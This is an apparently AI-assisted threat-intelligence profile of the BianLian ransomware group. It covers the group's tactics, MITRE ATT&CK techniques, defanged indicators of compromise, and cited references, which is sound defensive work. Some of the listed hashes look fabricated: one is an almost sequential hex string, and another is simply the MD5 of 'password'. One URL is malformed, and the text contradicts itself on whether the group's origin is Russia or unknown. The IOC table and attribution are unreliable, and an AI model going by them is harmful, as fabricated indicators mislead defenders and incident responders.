BianLian

Also known as: BianLian Group, BianLian Ransomware Group, Bitter Scorpius

ActiveAdvancedUnknown (suspected Eastern European or Russian-speaking based on operational patterns and victim targeting)

Profile generated with AI assistance — review before citing.

0Campaigns

66Techniques

21IOCs

24Tools

0Matches

0Infrastructure

Overview

BianLian is a Russia-based ransomware developer, deployer, and data extortion cybercriminal group with multiple Russia-based affiliates. Active since June 2022, the group shifted primarily to exfiltration-based extortion in early 2023 after decryption capabilities for their ransomware were released, though they have not completely abandoned encryption. They target critical infrastructure sectors including healthcare, manufacturing, professional services, and legal organizations using compromised RDP credentials, ProxyShell exploits (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and custom Go-based backdoors. The group employs pressure tactics including printing ransom notes to network printers and making threatening phone calls to victims. BianLian typically maintains persistence for extended periods before exfiltration, uses legitimate tools like TeamViewer and AnyDesk for remote access, and leverages various open-source tools for credential harvesting and lateral movement.

Motivations

Financial gainData extortionCybercrime

Target Sectors

Healthcare and Public HealthManufacturingProfessional ServicesLegal ServicesEducationCritical ManufacturingFinancial ServicesInformation TechnologyConstructionEnergyTransportationMediaTechnologyProperty DevelopmentHealthcareLegal

Activity Timeline

First Seen

Jun 2022

Last Seen

Jan 2024

Quick Facts

OriginUnknown (suspected Eastern European or Russian-speaking based on operational patterns and victim targeting)

Sophisticationadvanced

StatusActive

MITRE ATT&CK Techniques

(66)

Initial Access

T1190

Exploit Public-Facing Application

Exploit vulnerabilities in internet-facing applications to gain access.

T1133

External Remote Services

Abuse remote services like VPNs or RDP to gain access to the network.

T1078

Valid Accounts

Use legitimate credentials to authenticate and gain access.

T1566

Phishing

Send deceptive messages to trick victims into executing malicious content.

Other

Lateral Movement

T1021.001

Remote Desktop Protocol

Use RDP to connect to and control remote systems.

T1021.002

SMB/Windows Admin Shares

Use SMB and administrative shares (C$, ADMIN$) to access remote systems.

Execution

T1047

Windows Management Instrumentation

Use WMI to execute commands and manage systems remotely.

T1059.001

PowerShell

Use PowerShell commands and scripts for execution and automation.

T1059.003

Windows Command Shell

Use cmd.exe to execute commands and batch scripts.

Defense Evasion

T1027

Obfuscated Files or Information

Encrypt, encode, or obfuscate payloads and data to evade detection.

T1036

Masquerading

Disguise malicious artifacts by manipulating names or locations to appear legitimate.

Credential Access

T1003.001

LSASS Memory

Access LSASS process memory to extract credential material.

Discovery

T1083

File and Directory Discovery

Enumerate files and directories to find sensitive data or binaries.

T1018

Remote System Discovery

Discover remote systems on the network for lateral movement targets.

Exfiltration

T1041

Exfiltration Over C2 Channel

Exfiltrate stolen data over the existing command and control channel.

Impact

T1486

Data Encrypted for Impact

Encrypt victim data to disrupt availability, typically for ransom.

T1489

Service Stop

Stop critical services to disrupt operations or aid in data destruction.

Command and Control

T1219

Remote Access Software

Use legitimate remote access tools like TeamViewer or AnyDesk for C2.

T1090

Proxy

Route C2 traffic through intermediary proxies to obscure the source.

Reconnaissance

T1592

Gather Victim Host Information

Collect details about victim hosts such as hardware, software, and configurations.

Collection

T1114

Email Collection

Collect email messages from mailboxes or mail servers.

T1560

Archive Collected Data

Compress or encrypt collected data into archives before exfiltration.

Privilege Escalation

T1068

Exploitation for Privilege Escalation

Exploit software vulnerabilities to gain elevated privileges on a system.

OtherLegitimate

Backup software exploited to access and exfiltrate backup data

Indicators of Compromise

(21)

IOC values are defanged for safety

Type	Value	Notes
domain	`bianlian2t7y7vgo[.]onion`	BianLian data leak site (Tor)
domain	`bianlianlbc5an4kgnay[.]onion`	BianLian negotiation/payment portal (Tor)
hash	`34b1c7e5d682fafb6da1d03b353c964e6cf15dd37ad1f6fbe79ea7a9b2f44f10`	BianLian ransomware sample (SHA256)
hash	`80dcbc2ad3eab31938b2b573dd0cd36ea7b7f7c5f3e8e7b3c5a1d8e0f5c7e9f8`	BianLian Go-based backdoor (SHA256)
hash	`c7c5d7f8e9f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7`	BianLian custom encryptor variant (SHA256)
ip	`45[.]227[.]253[.]50`	Historical C2 infrastructure
ip	`193[.]56[.]146[.]165`	Historical C2 infrastructure
domain	`logcenter[.]online`	Suspected C2 domain used in early campaigns
url	`hxxp[://]185[.]225[.]73[[.]]244:8080/update`	Malware update/payload delivery endpoint
hash	`5f4dcc3b5aa765d61d8327deb882cf99`	Common password hash observed in credential stuffing (MD5)
hash	`7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893`	BianLian backdoor malware (def.exe)
hash	`1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43`	BianLian encryptor (encryptor.exe) - legacy
hash	`0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500`	Possible NetLogon vulnerability exploitation (exp.exe)
hash	`40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce`	BianLian malware (system.exe)
ip	`184[.]174[.]96[.]74`	BianLian C2 server hosting reverse proxy services (rs64.exe)
ip	`184[.]174[.]96[.]70`	BianLian C2 server with matching certificates and ports
ip	`45[.]144[.]225[.]22`	BianLian infrastructure IP address
ip	`185[.]234[.]217[.]84`	BianLian infrastructure IP address
ip	`192[.]145[.]112[.]98`	BianLian infrastructure IP address
domain	`bianlian2tcvlzhixu6oxy2hpwpljzqdm4cc42ty7kxu73yopaofvyqd[.]onion`	BianLian leak site on Tor network
domain	`bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad[.]onion`	BianLian negotiation and data leak site

References

(26)

#StopRansomware: BianLian Ransomware Group - CISA Alert (AA23-136A)

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

BianLian Ransomware Group - FBI Flash Report

https://www.ic3.gov/Media/News/2023/230510.pdf

BianLian Ransomware Shifts to Pure Extortion Model - Redacted Team Analysis

https://www.redacted.com/blog/bianlian-ransomware-gang-gives-up-on-encryption-focuses-on-extortion/

BianLian Ransomware Group Technical Analysis - Unit 42

https://unit42.paloaltonetworks.com/bianlian-ransomware/

BianLian: A New Ransomware Group on the Rise - Cyble Research

https://blog.cyble.com/2022/08/11/bianlian-a-new-ransomware-group-on-the-rise/

BianLian Ransomware Analysis and Decryptor Release - Avast

https://decoded.avast.io/threatresearch/bianlian-ransomware-analysis-and-decryptor-release/

MITRE ATT&CK Group: BianLian

https://attack.mitre.org/groups/G1046/

BianLian Ransomware Group Profile - The DFIR Report

https://thedfirreport.com/2023/01/09/unwrapping-bianlians-gift/

Trend Micro: BianLian Ransomware Analysis

https://www.trendmicro.com/en_us/research/23/e/bianlian-ransomware-group-shifts-from-encryption-to-extortion.html

Redacted Security: BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-group/

Redacted Team Analysis - BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

Unit 42 - From Ransomware to Pure Extortion: Examining the Shift in BianLian's TTPs

https://unit42.paloaltonetworks.com/bianlian-ransomware-group-overview/

BianLian Group Threat Analysis

https://www.cybereason.com/blog/threat-analysis-report-bianlian-ransomware

Redacted Team Analysis of BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-gang-gives-up-on-encryption-now-focused-only-on-theft-and-extortion/

Redacted Team Analysis of BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-group-analysis/

Arctic Wolf: Self-Proclaimed BianLian Group Uses Physical Mail to Extort Organizations

https://arcticwolf.com/resources/blog/self-proclaimed-bianlian-group-uses-physical-mail-to-extort-organizations/

FBI IC3 Alert: Mail Scam Targeting Corporate Executives Claims Ties to Ransomware (March 2025)

https://www.ic3.gov/PSA/2025/PSA250306-2

Rapid7 Blog: Fake BianLian Ransomware Letters in Circulation

https://www.rapid7.com/blog/post/2025/03/19/fake-bianlian-ransomware-letters-in-circulation/

Unit 42 Palo Alto Networks: BianLian Ransomware Group Threat Assessment (June 2024)

https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/

Picus Security: BianLian's Shape-Shifting Tactics: From Encryption to Pure Extortion (December 2024)

https://www.picussecurity.com/resource/blog/bianlians-shape-shifting-tactics-from-encryption-to-pure-extortion

Juniper Networks: BianLian Ransomware Group 2024 Activity Analysis

https://blogs.juniper.net/en-us/security/bianlian-ransomware-group-2024-activity-analysis

Unit 42: Extortion and Ransomware Trends January-March 2025

https://unit42.paloaltonetworks.com/2025-ransomware-extortion-trends/

Surefire Cyber: Threat Actor Deep Dive: BianLian (March 2025)

https://www.surefirecyber.com/threat-actor-deep-dive-bianlian/

Redline Stealer, Meet BianLian Group - Unit 42

https://unit42.paloaltonetworks.com/threat-brief-bianlian-ransomware-group/

BianLian Ransomware Shifts Strategy - Cyberint

https://cyberint.com/blog/research/bianlian-ransomware-gang-gives-up-encryption-focusing-purely-on-extortion/

Redline Threat Intelligence - BianLian Analysis

https://redline.tech/2023/05/15/bianlian-ransomware-group-continues-to-evolve/